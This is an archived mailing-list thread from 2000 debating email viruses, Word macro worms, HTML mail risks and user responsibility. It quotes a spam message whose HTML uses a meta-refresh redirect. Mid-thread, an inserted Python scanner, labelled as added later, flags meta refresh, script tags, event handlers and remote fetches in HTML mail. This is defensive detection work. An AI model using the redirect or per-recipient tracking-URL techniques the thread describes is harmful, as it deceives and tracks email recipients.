RE: VIRUS WARNING
PLEASE change the title of this thread. It borders on a partial self denial of service, since the title is now misleading. Thank you. Bill Flanigan -Original Message- From: Henry Clark [mailto:[EMAIL PROTECTED]] Sent: Sunday, May 14, 2000 4:35 PM To: Jeremy Cc: [EMAIL PROTECTED] Subject: Re: VIRUS WARNING At 01:38 PM 5/12/00 -0400, Jeremy wrote: Can you please please stop this Virus Thread. This thread _is_ the virus...
Re: VIRUS WARNING
At 01:38 PM 5/12/00 -0400, Jeremy wrote: Can you please please stop this Virus Thread. This thread _is_ the virus...
Re: VIRUS WARNING
On Fri, 12 May 2000 13:38:43 EDT, Jeremy said: Can you please please stop this Virus Thread. Actually, there *ARE* important issues here. Would the IESG support the creation of a WG to discuss these, with the charter of producing a BCP documenting what *should* be done to minimize these risks in today's internet? Talking about a WG seems premature. The first step would be to start a discussion list and maybe schedule a BOF. If those steps prove fruitful a WG would be a possibility. I can set up a mailing list if you like. Ned
RE: VIRUS WARNING
Let's see if this reasoning holds water. Imagine your favorite OS, suppose that I send you a .pl file (Perl Script). You then make the "mistake" of saving it to the file system and then proceed to running the script. What do you think that script can do?. What will you have to do to fix your problem?. This is completely analogous to changing the default selection on the "Do you want to run this document's macros" dialog from "NO" to "YES". We have become a society of excuses people, nothing is our fault. It is always somebody else's fault. WE HAVE TO TAKE RESPONSIBILITY FOR OUR OWN ACTIONS ps: if I made this stupid mistake, I will immediately check what macros are included in the forsaken document and delete them. -Original Message- From: Doug Sauder [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 5:55 PM To: Castro, Edison M. (PCA); [EMAIL PROTECTED] Subject: RE: VIRUS WARNING -Original Message- From: Castro, Edison M. (PCA) [mailto:[EMAIL PROTECTED]] That is exactly the same way that all Windows virus work. As a Windows user (as well as other OSes), I can say that people have to be responsible for their actions. Whenever you receive any Email attachment, the only way that attachment can produce any damage is if you run it. At least in my copy of MS Word anytime I open a word document and it contains any macros, Word readily ask me if I want to allow the macro to execute. Not only that, this version of Word (2000) is configured to only ask me when a signed (with a certificate of a trusted party) macro is included. Suppose you made the mistake of opening a Word document with a VBA (Visual Basic for Applications) script virus. (I did this once and I am sharing a real-life experience.) The VBA script turns off the option that disables automatically running scripts. I kid you not! Next time you open a Word document that contains a script, you won't be asked whether you want to run it. 
If you go into the options settings and set the option to disable running scripts, you have done nothing, because the virus script runs when you close the document and turns the option back off again. At least not allowing macros to disable the don't-run-macros option seems reasonable to me, but it seemed to have escaped the engineers who created Microsoft Word. Doug Sauder Software Engineer Broadsoft, Inc
RE: VIRUS WARNING
Oh, I agree that we have to take responsibility for our own actions. I am absolutely responsible for allowing the macro to run. After I mistakenly ran the macro, my first thought was to neutralize it -- to stop it from spreading further -- by disabling the automatic running of macros. Unfortunately, Word paid more attention to what the macro wanted, than what *I* the user wanted. I said "DON'T RUN MACROS!!". The macro said "run macros." Guess who Word listened to? Do you see the catch? It's not a matter of not being responsible. I take the blame. But MS made it much easier for the virus to get the upper hand. The don't-run-macros option is only halfway useful if you can only turn it off, but can never turn it on again. At that time I knew very little about macros. The VBA editor seemed non-intuitive to use. I tried to remove the virus by deleting the VBA script, and that took several hours of research in MS Word How-To books. I finally ended up going out to a store and buying the virus clean-up software. -- Doug Sauder Software Engineer Broadsoft, Inc -Original Message- From: Castro, Edison M. (PCA) [mailto:[EMAIL PROTECTED]] Sent: Friday, May 12, 2000 08:45 To: 'Doug Sauder'; Castro, Edison M. (PCA); [EMAIL PROTECTED] Subject: RE: VIRUS WARNING Let's see if this reasoning holds water. Imagine your favorite OS, suppose that I send you a .pl file (Perl Script). You then make the "mistake" of saving it to the file system and then proceed to running the script. What do you think that script can do?. What will you have to do to fix your problem?. This is completely analogous to changing the default selection on the "Do you want to run this document's macros" dialog from "NO" to "YES". We have become a society of excuses people, nothing is our fault. It is always somebody else's fault. WE HAVE TO TAKE RESPONSIBILITY FOR OUR OWN ACTIONS ps: if I made this stupid mistake, I will immediately check what macros are included in the forsaken document and delete them. 
-Original Message- From: Doug Sauder [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 5:55 PM To: Castro, Edison M. (PCA); [EMAIL PROTECTED] Subject: RE: VIRUS WARNING -Original Message- From: Castro, Edison M. (PCA) [mailto:[EMAIL PROTECTED]] That is exactly the same way that all Windows virus work. As a Windows user (as well as other OSes), I can say that people have to be responsible for their actions. Whenever you receive any Email attachment, the only way that attachment can produce any damage is if you run it. At least in my copy of MS Word anytime I open a word document and it contains any macros, Word readily ask me if I want to allow the macro to execute. Not only that, this version of Word (2000) is configured to only ask me when a signed (with a certificate of a trusted party) macro is included. Suppose you made the mistake of opening a Word document with a VBA (Visual Basic for Applications) script virus. (I did this once and I am sharing a real-life experience.) The VBA script turns off the option that disables automatically running scripts. I kid you not! Next time you open a Word document that contains a script, you won't be asked whether you want to run it. If you go into the options settings and set the option to disable running scripts, you have done nothing, because the virus script runs when you close the document and turns the option back off again. At least not allowing macros to disable the don't-run-macros option seems reasonable to me, but it seemed to have escaped the engineers who created Microsoft Word. Doug Sauder Software Engineer Broadsoft, Inc
Re: VIRUS WARNING
John Stracke wrote: Well, there's basic formatting: [...] And even simple links (never mind forms, applets, etc.) are great for, say, workflow applications. When I worked for Netscape, HR made great use of HTML mail in the internal network. When I wanted to take some Email is not the web. John
Re: VIRUS WARNING
On Fri, 12 May 2000 09:33:02 CDT, John Kristoff [EMAIL PROTECTED] said: John Stracke wrote: Well, there's basic formatting: [...] And even simple links (never mind forms, applets, etc.) are great for, say, workflow applications. When I worked for Netscape, HR made great use of HTML mail in the internal network. When I wanted to take some Email is not the web. On the other hand, e-mail does a MUCH better job of some things than the web does. In particular, if you do workflow via e-mail (especially with PGP or other authentication/encryption), you can send the object to the next person that needs it, and *NOT* expose it to the rest of the world. If you do it web-based, you then have all the ugly issues of getting it onto the webserver, setting access controls on it so that only the intended person can get at it, etc etc etc. Incidentally, this is exactly the same issue as "attach a file to an e-mail" versus "send the recipient a note, copy the file to a ftp/web server, wait for him to retrieve it, and then remember to clean it up afterwards". Let's face it guys - unless we collectively come up with a better way to do it, there's going to be a continued push towards having more "push" style interaction via e-mail. RFC1440 (Sender-Initiated File Transfer) appears to be essentially dead, and no new contenders have arrived -- Valdis Kletnieks Operating Systems Analyst Virginia Tech
Re: VIRUS WARNING
On Thu, May 11, 2000 at 08:36:52PM +0200, Jacob Palme wrote:

At 10.11 -0600 0-05-11, Vernon Schryver wrote:

Once you restrict HTML based email enough to be safe, why bother with anything more than text and perhaps simple pictures?

What is wrong with that. I use HTML-based e-mail mostly to include pictures in my messages. A very useful way of using HTML-based e-mail would also be to send out forms and fill them in via mail, but this does not work so well because some mailers do not handle such messages very well yet.

And of course, a day after posting my earlier reply to this message, I receive this example of how useful HTML is in E-Mail:

[...]
] X-Mailer: DiffondiCool V3.1.1 (W95/NT) Delfino Solutions (Build: Nov 7 1998)
] Mime-Version: 1.0
] Date: Fri, 12 May 2000 21:33:03 +0800
] Content-Type: multipart/mixed; boundary="=_NextPart_000_007F_01BDF6C7.FABAC1B0"
] Content-Transfer-Encoding: 7bit
]
] This is a MIME Message
]
] --=_NextPart_000_007F_01BDF6C7.FABAC1B0
] Content-Type: text/plain; charset="iso-8859-1"
] Content-Transfer-Encoding: quoted-printable
]
]
] --=_NextPart_000_007F_01BDF6C7.FABAC1B0
] Content-Type: text/html; name="unknown.htm"
] Content-Transfer-Encoding: quoted-printable
] Content-Description: unknown.htm
] Content-Disposition: inline; filename="unknown.htm"
]
] <html><head>
] <meta http-equiv=3D"refresh" content=3D"0;URL=3Dhttp://myad.cn99.com">
] </head></html>
]
] --=_NextPart_000_007F_01BDF6C7.FABAC1B0--

Well goooleee. I wonder what that piece of crap was supposed to do. I'll bet this spammer thought I was stupid enough to be using an HTML enabled reader that would just bounce me right to his spam site where he would not only hit me with his cruft but he would also know that his E-Mail hit paydirt and he had a good address on this host. All without any active content at all. Oh well... Guess he failed on this one. How many chumps do you think he might have succeeded with? I got hit with three copies of it (various permutations of my addresses). I'll probably see more before the day is out. BTW... According to the Received-By headers, the point of origin was in .cn, so it will be a bloody cold day in hell before I'm able to do anything about this clown. Grrr... If people wouldn't use HTML readers, this trick wouldn't work at all, and I wouldn't have to tolerate this cruft (yes, I know, they would try something else but at least it wouldn't be this morally offensive).

-- Jacob Palme [EMAIL PROTECTED] (Stockholm University and KTH) for more info see URL: http://www.dsv.su.se/jpalme/

Mike
--
Michael H. Warfield | (770) 985-6132 | [EMAIL PROTECTED]
(The Mad Wizard) | (770) 331-2437 | http://www.wittsend.com/mhw/
NIC whois: MHW9 | An optimist believes we live in the best of all
PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it!
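A check that a list operator or mail gateway could run against messages like the one quoted above, as an added example that is not part of the original post: it decodes each text/html part and reports constructs that act or fetch as soon as the message is displayed. The sample messages, the host ads.example.invalid, and the names scan_message and should_hold are constructed for illustration.

```python
import email
from email import policy
from html.parser import HTMLParser

# Constructed sample modelled on the message quoted above. The host name and
# identifiers are placeholders, not values taken from the thread.
SAMPLE = b"""\
From: sender@example.invalid
Subject: constructed sample
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="=_Part_0001"

--=_Part_0001
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


--=_Part_0001
Content-Type: text/html; name="unknown.htm"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline; filename="unknown.htm"

<html><head>
<meta http-equiv=3D"refresh" content=3D"0;URL=3Dhttp://ads.example.invalid/?id=3Dabc123">
</head><body>
<img src=3D"http://ads.example.invalid/p.gif?u=3Dabc123" width=3D"1" height=3D"1">
<a href=3D"http://ads.example.invalid/offer">offer</a>
</body></html>

--=_Part_0001--
"""

# Constructed plain-text control message: a URL in text is not rendered HTML.
PLAIN = b"From: a@example.invalid\nSubject: text only\n\nSee http://example.invalid/ for details.\n"

URL_ATTRS = ("src", "href", "background", "data", "action")
CLICK_ONLY = {"a", "area", "form"}  # URL is used only if the reader acts
ACTIVE_TAGS = {"script", "object", "embed", "applet", "iframe", "frame"}
HOLD_KINDS = {"meta-refresh", "active-content", "remote-fetch"}


def _is_remote(value):
    return value.strip().lower().startswith(("http://", "https://", "ftp://", "//"))


class HtmlRiskScanner(HTMLParser):
    """Collects (kind, detail) findings for one HTML body."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = {name: (value or "") for name, value in attrs}
        # A refresh sends an HTML-rendering reader to the URL with no script at all.
        if tag == "meta" and attrs.get("http-equiv", "").lower() == "refresh":
            self.findings.append(("meta-refresh", attrs.get("content", "")))
        if tag in ACTIVE_TAGS:
            self.findings.append(("active-content", tag))
        for name, value in attrs.items():
            if name.startswith("on") or (
                name in URL_ATTRS and value.strip().lower().startswith("javascript:")
            ):
                self.findings.append(("active-content", f"{tag} {name}"))
            elif name in URL_ATTRS and _is_remote(value):
                # Fetched on display (img, link, background...) unless the tag
                # only yields a URL when the reader clicks or submits.
                kind = "link" if tag in CLICK_ONLY else "remote-fetch"
                self.findings.append((kind, value.strip()))


def scan_message(raw):
    """Return [(disposition, kind, detail)] for every text/html part in raw bytes."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    report = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        payload = part.get_payload(decode=True) or b""  # undoes quoted-printable/base64
        html = payload.decode("latin-1")  # never fails; ASCII markup survives intact
        scanner = HtmlRiskScanner()
        scanner.feed(html)
        scanner.close()
        # A text/html part with no disposition is treated as the displayed body.
        disposition = part.get_content_disposition() or "inline"
        report.extend((disposition, kind, detail) for kind, detail in scanner.findings)
    return report


def should_hold(raw):
    """Hypothetical list policy: hold mail whose HTML acts or fetches when shown."""
    return any(kind in HOLD_KINDS for _, kind, _ in scan_message(raw))


if __name__ == "__main__":
    print(*scan_message(SAMPLE), sep="\n")
    print("hold:", should_hold(SAMPLE))
```

The unique query strings in the constructed refresh and image URLs show why a remote fetch alone is worth reporting: retrieving them confirms the address to the sender even though the message carries no script.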
Re: VIRUS WARNING
On Fri, 12 May 2000 [EMAIL PROTECTED] wrote: Incidentally, this is exactly the same issue as "attach a file to an e-mail" versus "send the recipient a note, copy the file to a ftp/web server, wait for him to retrieve it, and then remember to clean it up afterwards". Only if the e-mail client in question automatically executes the attached file. Indeed, I don't think any of the people who are complaining about the "HTML in e-mail" issues would complain about someone sending an e-mail with an HTML file as an attachment. At least, not as I understand their arguments against it. At any rate, it is certainly not "exactly the same issue" - people have expounded upon the differences already. -=I would imagine that if 1000 Rwandan's were hacked to death AT THE EXPO, people would sure have raised a stink.=-
RE: VIRUS WARNING
Castro, Edison M. (PCA) writes: WE HAVE TO TAKE RESPONSIBILITY FOR OUR OWN ACTIONS Yeah, right ... when it comes to shouting, all this "blame the victim" has gone too far. I have users who are *illiterate*. They can click, but they can't read. They can click on little pictures and listen to greetings in their native language or view videos of relatives they haven't seen in decades. I refuse to believe this is bad. Some of my illiterate users just haven't learned to read *yet*. They will when they're old enough to go to school. However, it will be a long time before they can comprehend that the computer screen is a window into a world full of bad people who want to damage their mommy's computer. These users are here in the US. That the 'love bug' worm is believed to have originated in the Philippines should be sufficient reminder that not every potential victim is a literate English-speaking resident of North America or Europe. It may be that technology has no way for the network to protect villagers in Bangladesh or central Africa. However, reaching that conclusion and saying the network should not try as a matter of philosophical principle are very different. Of course capable users should protect themselves as best they can, but who is prepared to say that helpless users don't belong on our Internet? -- Dick St.Peters, [EMAIL PROTECTED] Gatekeeper, NetHeaven, Saratoga Springs, NY Saratoga/Albany/Amsterdam/BoltonLanding/Cobleskill/Greenwich/ GlensFalls/LakePlacid/NorthCreek/Plattsburgh/... Oldest Internet service based in the Adirondack-Albany region
Re: VIRUS WARNING
From: chris d koeberle [EMAIL PROTECTED] ... Indeed, I don't think any of the people who are complaining about the "HTML in e-mail" issues would complain about someone sending an e-mail with an HTML file as an attachment. At least, not as I understand their arguments against it. Just as with sending any active MIME attachment including binary UNIX programs, it depends on the attached HTML file and who sent it. As has been pointed out repeatedly and as demonstrated with a concrete example Saturday morning, attached HTML can be a significant security problem. I doubt that (probably porn) HTML spam was much of a security threat, but if you think about it for a little, you can surely see how such things can be real security problems. The practice of sending both HTML and cleartext of supposedly the same message reflects very poorly on those who do it intentionally and on those who cause MUA's to trick others into doing it unintentionally. Never mind the security issues, but consider only the wastes of disk space, CPU processing, network bandwidth, and the inevitable differences between the two versions. If the two messages were the same, then there would be no excuse for sending both. If they differ, then one must be wrong, and sending both is worse than a waste. Vernon Schryver[EMAIL PROTECTED]
Re: VIRUS WARNING
On Fri, May 12, 2000 at 12:04:08PM -0400, chris d koeberle wrote: On Fri, 12 May 2000 [EMAIL PROTECTED] wrote: Incidentally, this is exactly the same issue as "attach a file to an e-mail" versus "send the recipient a note, copy the file to a ftp/web server, wait for him to retrieve it, and then remember to clean it up afterwards". Only if the e-mail client in question automatically executes the attached file. Indeed, I don't think any of the people who are complaining about the "HTML in e-mail" issues would complain about someone sending an e-mail with an HTML file as an attachment. At least, not as I understand their arguments against it. Wrong... We object to it so strenuously that we've added global blocking filters to majordomo at our site in "taboo-body". We've had one too many come through with a hostile java script worm in it and then had a few dozen people complain that we're distributing viruses and a few hundred get burned by it. BTW... The site in question has over 70 mailing lists with almost 50,000 unique addresses subscribed to one or more lists. We can't tolerate html on the mailing lists at all, if for no other reason than the administrative headache that occurs when hostile content (active or not) propagates over any of the lists. At any rate, it is certainly not "exactly the same issue" - people have expounded upon the differences already. -=I would imagine that if 1000 Rwandan's were hacked to death AT THE EXPO, people would sure have raised a stink.=- Mike -- Michael H. Warfield| (770) 985-6132 | [EMAIL PROTECTED] (The Mad Wizard) | (770) 331-2437 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471| possible worlds. A pessimist is sure of it!
Re: VIRUS WARNING
Can you please please stop this Virus Thread. -jeremy On Fri, 12 May 2000, Vernon Schryver wrote: From: chris d koeberle [EMAIL PROTECTED] ... Indeed, I don't think any of the people who are complaining about the "HTML in e-mail" issues would complain about someone sending an e-mail with an HTML file as an attachment. At least, not as I understand their arguments against it. Just as with sending any active MIME attachment including binary UNIX programs, it depends on the attached HTML file and who sent it. As has been pointed out repeatedly and as demonstrated with a concrete example Saturday morning, attached HTML can be a significant security problem. I doubt that (probably porn) HTML spam was much of a security threat, but if you think about it for a little, you can surely see how such things can be real security problems. The practice of sending both HTML and cleartext of supposedly the same message reflects very poorly on those who do it intentionally and on those who cause MUA's to trick others into doing it unintentionally. Never mind the security issues, but consider only the wastes of disk space, CPU processing, network bandwidth, and the inevitable differences between the two versions. If the two messages were the same, then there would be no excuse for sending both. If they differ, then one must be wrong, and sending both is worse than a waste. Vernon Schryver[EMAIL PROTECTED]
RE: VIRUS WARNING
No offence here people, but whilst we are on the subject of Viruses can we change the Subject Title. I don't know who you all are and I'm getting paranoid :-) Thanks Jon 'Scared Little Puppy' -Original Message- From: Dick St.Peters [mailto:[EMAIL PROTECTED]] Sent: Friday, May 12, 2000 5:31 PM To: [EMAIL PROTECTED] Subject: RE: VIRUS WARNING Castro, Edison M. (PCA) writes: WE HAVE TO TAKE RESPONSIBILITY FOR OUR OWN ACTIONS Yeah, right ... when it comes to shouting, all this "blame the victim" has gone too far. I have users who are *illiterate*. They can click, but they can't read. They can click on little pictures and listen to greetings in their native language or view videos of relatives they haven't seen in decades. I refuse to believe this is bad. Some of my illiterate users just haven't learned to read *yet*. They will when they're old enough to go to school. However, it will be a long time before they can comprehend that the computer screen is a window into a world full of bad people who want to damage their mommy's computer. These users are here in the US. That the 'love bug' worm is believed to have originated in the Philippines should be sufficient reminder that not every potential victim is a literate English-speaking resident of North America or Europe. It may be that technology has no way for the network to protect villagers in Bangladesh or central Africa. However, reaching that conclusion and saying the network should not try as a matter of philosophical principle are very different. Of course capable users should protect themselves as best they can, but who is prepared to say that helpless users don't belong on our Internet? -- Dick St.Peters, [EMAIL PROTECTED] Gatekeeper, NetHeaven, Saratoga Springs, NY Saratoga/Albany/Amsterdam/BoltonLanding/Cobleskill/Greenwich/ GlensFalls/LakePlacid/NorthCreek/Plattsburgh/... Oldest Internet service based in the Adirondack-Albany region
Re: VIRUS WARNING
On Fri, 12 May 2000, Vernon Schryver wrote: As has been pointed out repeatedly and as demonstrated with a concrete example Saturday morning, attached HTML can be a significant security problem. I doubt that (probably porn) HTML spam was much of a security threat, but if you think about it for a little, you can surely see how such things can be real security problems. I think there's some confusion in terminology, here, possibly on my part. Some mail clients permit the sending of an HTML _message_, where other clients will automatically parse the HTML in the message as HTML instead of plain text. I am trying desperately to distinguish between this practice and the ability to attach HTML as a binary file. Binary attached HTML presents a subset of the risks of all binary attachments - you may, if you choose to open the attachment, be disappointed in the results. HTML as e-mail presents further risks for clients which are willing to interpret the HTML (Outlook and Outlook Express both do this in their default configuration.) -=I would imagine that if 1000 Rwandan's were hacked to death AT THE EXPO, people would sure have raised a stink.=-
Re: VIRUS WARNING
On Fri, 12 May 2000 13:38:43 EDT, Jeremy said: Can you please please stop this Virus Thread. Actually, there *ARE* important issues here. Would the IESG support the creation of a WG to discuss these, with the charter of producing a BCP documenting what *should* be done to minimize these risks in today's internet? -- Valdis Kletnieks Operating Systems Analyst Virginia Tech
RE: VIRUS WARNING
this is a good idea !! maybe the security wg could look into this. Jeff, Marcus , any comments ?? /pd -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Friday, May 12, 2000 2:05 PM To: [EMAIL PROTECTED] Subject: Re: VIRUS WARNING On Fri, 12 May 2000 13:38:43 EDT, Jeremy said: Can you please please stop this Virus Thread. Actually, there *ARE* important issues here. Would the IESG support the creation of a WG to discuss these, with the charter of producing a BCP documenting what *should* be done to minimize these risks in today's internet? -- Valdis Kletnieks Operating Systems Analyst Virginia Tech
RE: VIRUS WARNING
All of that can be done in pure ASCII. ... that is, if you speak English. You can definitely write the way of Shakespeare, but you have a tiny problem writing the way of Molière, let alone Confucius. Then, there are things that are hard to do in writing, however able is your prose. Maps and pictures, songs and recordings come to mind. There was a rationale for creating MIME. Framing the debate as ASCII versus HTML is a bit reductive. The real separation here is self-contained versus network based. Carrying a picture in a message is definitely valuable, carrying a link to a picture that is stored on some random web site creates an obvious privacy risk -- the URL itself can be the hidden communication channel that tracks you.
Re: VIRUS WARNING
In message [EMAIL PROTECTED], Einar Stefferud writes: The first of these "worm/virus/addressbookmailers" was the IBM PROFS "Christmas Card" caper that occurred some time in the early 1990's, long before MS willfully adopted the design. It was in December, 1987. Seems to me that this beloved "feature" (giving root privs to random EMail messages) should (by now) be fully discredited, and should be destined for extinction, if only the customers will accept its disappearance in trade for an absence of a continuing flood of these $6,000,000,000 economic loss episodes. See http://catless.ncl.ac.uk/Risks/5.80.html#subj1 for details on how it worked -- but it didn't involve any analog to 'root' privileges. When the recipient got a copy, there was an included (or attached; I don't quite remember) REXX file. (REXX was a scripting language for VM/CMS.) The message told you that it would display a Christmas card if you ran it; most users did just that, since the note appeared to come from someone they knew. And then the file replicated itself; you all know the rest. Note the two crucial points -- it ran with the user's permissions, and it was explicitly run by the user, rather than by any automatic mechanism. --Steve Bellovin
RE: VIRUS WARNING
That is exactly the same way that all Windows virus work. As a Windows user (as well as other OSes), I can say that people have to be responsible for their actions. Whenever you receive any Email attachment, the only way that attachment can produce any damage is if you run it. At least in my copy of MS Word anytime I open a word document and it contains any macros, Word readily ask me if I want to allow the macro to execute. Not only that, this version of Word (2000) is configured to only ask me when a signed (with a certificate of a trusted party) macro is included. -Original Message- From: Steven M. Bellovin [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 7:40 AM To: [EMAIL PROTECTED] Cc: Brant Knudson; [EMAIL PROTECTED] Subject: Re: VIRUS WARNING In message [EMAIL PROTECTED], Einar Stefferud writes: The first of these "worm/virus/addressbookmailers" was the IBM PROFS "Christmas Card" caper that occurred some time in the early 1990's, long before MS willfully adopted the design. It was in December, 1987. Seems to me that this beloved "feature" (giving root privs to random EMail messages) should (by now) be fully discredited, and should be destined for extinction, if only the customers will accept its disappearance in trade for an absence of a continuing flood of these $6,000,000,000 economic loss episodes. See http://catless.ncl.ac.uk/Risks/5.80.html#subj1 for details on how it worked -- but it didn't involve any analog to 'root' privileges. When the recipient got a copy, there was an included (or attached; I don't quite remember) REXX file. (REXX was a scripting language for VM/CMS.) The message told you that it would display a Christmas card if you ran it; most users did just that, since the note appeared to come from someone they knew. And then the file replicated itself; you all know the rest. Note the two crucial points -- it ran with the user's permissions, and it was explicitly run by the user, rather than by any automatic mechanism. 
--Steve Bellovin
Re: VIRUS WARNING
On Thu, 11 May 2000 08:24:11 EDT, "Castro, Edison M. (PCA)" said: That is exactly the same way that all Windows virus work. As a Windows user (as well as other OSes), I can say that people have to be responsible for their actions. Whenever you receive any Email attachment, the only way that attachment can produce any damage is if you run it. Well, it's worse. Melissa, the Love Bug, and the Christmas worm all required the user to take an action (click/open/run the payload). However, there's apparently ANOTHER hole Seen on a SANS posting yesterday: /Valdis -- 10 May 2000 Email viruses are now spreading WITHOUT THE USER OPENING ANY ATTACHMENT. Personal computers running Internet Explorer (IE) version 5.0 and/or Microsoft Office 2000 are vulnerable to virus attacks using most email systems, even if the email recipient opens no attachments. You don't even have to use IE; just have it installed with the default security settings. If you have not closed the hole, you can receive viruses (and spread them) by viewing or previewing malicious email without opening any attachment, or by visiting a malicious web site. The problem is caused by a programming bug in an Internet Explorer ActiveX control called scriptlet.typelib. This is by far the fastest growing virus distribution problem and ripe for a hugely destructive event - at least as large as the ILOVEYOU virus. Updating your virus detection software, while important, is not an effective solution for this problem. You must also close the hole. The hole can be closed in five minutes or less using tools available at Microsoft's security site: http://www.microsoft.com/security/bulletins/ms99-032.asp The correction script may be run directly from: http://www.microsoft.com/msdownload/iebuild/scriptlet/en/scriptlet.htm Editor's Note: Thanks to Jimmy Kuo of Network Associates and Nick FitzGerald of Computer Virus Consulting Ltd. for raising the visibility of this dangerous problem.
RE: VIRUS WARNING
I believe one of the most important holes is html based mail, because the e-mail is processed as a webpage which can be used to download undesirable content. If you configure your e-mail browser to display all messages as text you will close this hole...You will notice my e-mails are nearly 100% text Scot -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 9:45 AM To: Castro, Edison M. (PCA) Cc: 'Steven M. Bellovin'; [EMAIL PROTECTED]; Brant Knudson; [EMAIL PROTECTED] Subject: Re: VIRUS WARNING On Thu, 11 May 2000 08:24:11 EDT, "Castro, Edison M. (PCA)" said: That is exactly the same way that all Windows virus work. As a Windows user (as well as other OSes), I can say that people have to be responsible for their actions. Whenever you receive any Email attachment, the only way that attachment can produce any damage is if you run it. Well, it's worse. Melissa, the Love Bug, and the Christmas worm all required the user to take an action (click/open/run the payload). However, there's apparently ANOTHER hole Seen on a SANS posting yesterday: /Valdis -- 10 May 2000 Email viruses are now spreading WITHOUT THE USER OPENING ANY ATTACHMENT. Personal computers running Internet Explorer (IE) version 5.0 and/or Microsoft Office 2000 are vulnerable to virus attacks using most email systems, even if the email recipient opens no attachments. You don't even have to use IE; just have it installed with the default security settings. If you have not closed the hole, you can receive viruses (and spread them) by viewing or previewing malicious email without opening any attachment, or by visiting a malicious web site. The problem is caused by a programming bug in an Internet Explorer ActiveX control called scriptlet.typelib. This is by far the fastest growing virus distribution problem and ripe for a hugely destructive event - at least as large as the ILOVEYOU virus. 
Updating your virus detection software, while important, is not an effective solution for this problem. You must also close the hole. The hole can be closed in five minutes or less using tools available at Microsoft's security site: http://www.microsoft.com/security/bulletins/ms99-032.asp The correction script may be run directly from: http://www.microsoft.com/msdownload/iebuild/scriptlet/en/scriptlet.htm Editor's Note: Thanks to Jimmy Kuo of Network Associates and Nick FitzGerald of Computer Virus Consulting Ltd. for raising the visibility of this dangerous problem.
RE: VIRUS WARNING
From [EMAIL PROTECTED] Thu May 11 06:36:01 2000 From: Steven M. Bellovin [mailto:[EMAIL PROTECTED]] ... Note the two crucial points -- it ran with the user's permissions, and it was explicitly run by the user, rather than by any automatic mechanism. From: "Castro, Edison M. (PCA)" [EMAIL PROTECTED] That is exactly the same way that all Windows virus work. As a Windows user (as well as other OSes), I can say that people have to be responsible for their actions. Whenever you receive any Email attachment, the only way that attachment can produce any damage is if you run it. ... Not only that, this version of Word (2000) is configured to only ask me when a signed (with a certificate of a trusted party) macro is included. There are serious mistakes in that. First, is the perhaps minor point that rumor has it that Outlook Express (as opposed to Outlook) is eager to open attachments automatically. Second, what matters is not only what configuration changes can be made to close some of the holes, but how systems are configured by default from the CDROM's and how they are most commonly configured in practice. Third, and where the first serious mistake lies, on Windows 98 the worm did not run with merely the user's permissions. That contrasts with reasonable operating systems, where much of its damage would be impossible. Fourth, the most serious problem is that most computer users and many who consider themselves more than mere users have no clue what is meant by "the user's permissions." The main desktop operating system vendors can be blamed more for obscuring that notion among users than for their other crimes. It is the equivalent of refusing to equip cars with seat belts, air bags, stop lights and tail lights on grounds of "user-friendliness." Never mind that the current worm involved Visual Basic instead of Word macros. 
Regardless of the programming language, given the familiar "feature rich," "user friendliness," it's probably trivial for a worm to find the user's signature and sign its spawn. You wouldn't want users to need to type a passphrase, use a smart card, or anything else so complicated and user-unfriendly merely to send mail, would you? Thus, the next act in this circus will not only involve email from people you know (as this one did), but it will also be cryptographically signed by the apparent senders. Vernon Schryver[EMAIL PROTECTED]
RE: VIRUS WARNING
Scot, While what you say is true - meaning an all-text restriction on your email browser will prevent "dangerous goods" to be downloaded - it also takes away functionality. We have to find a way to be able to use html based email but restrict it from - say running scripts, executing anything, writing cookies, issuing queries, etc... Until that happens, you're right - html based email is like a runaway train. We have to invent the "brakes" now. Lillian Komlossy Site Manager http://www.dmnews.com http://www.imarketingnews.com (212) 925-7300 ext. 232 -Original Message- From: Scot Mc Pherson [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 10:07 AM To: [EMAIL PROTECTED]; 'Castro, Edison M. (PCA)' Cc: 'Steven M. Bellovin'; [EMAIL PROTECTED]; 'Brant Knudson'; [EMAIL PROTECTED] Subject: RE: VIRUS WARNING I believe the one of the most important holes is html based mail, because the e-mail is processed as a webpage which can be used to download undesirable content. If you configure your e-mail browser to display all messages as text you will close this hole...You will notice my e-mails are nearly 100% text Scot
RE: VIRUS WARNING
From: Lillian Komlossy [EMAIL PROTECTED] While what you say is true - meaning an all-text restriction on your email browser will prevent "dangerous goods" to be downloaded - it also takes away functionality. We have to find a way to be able to use html based email but restrict it from - say running scripts, executing anything, writing cookies, issuing queries, etc... Until that happens, you're right - html based email is like a runaway train. We have to invent the "brakes" now. Never mind the other reasons why HTML based email is considered an abomination by many who understand the issues. What you want is self-contradictory. What good is HTML based email if it cannot run scripts or even contain links to other HTML content? Once you restrict HTML based email enough to be safe, why bother with anything more than text and perhaps simple pictures? It's not only programs in email that are dangerous, but also HTTP references. Recall the recent disclosures concerning the use of unique to the target URL's of invisible pages in email and web sites instead of HTTP cookies. You want to run your freight train down a long pass with an 8% grade at 100 miles per hour, and not need to worry about it running away. Maybe someday there will be some other solution, but today the only tactics that let brakes control a train in such circumstances begin with going far less than 100 mph. You simply cannot have unbridled user-friendliness and security against bad guys. No matter what the salescritters and pointy-haired claim, security and convenience will always be at odds. Vernon Schryver[EMAIL PROTECTED]
Re: VIRUS WARNING
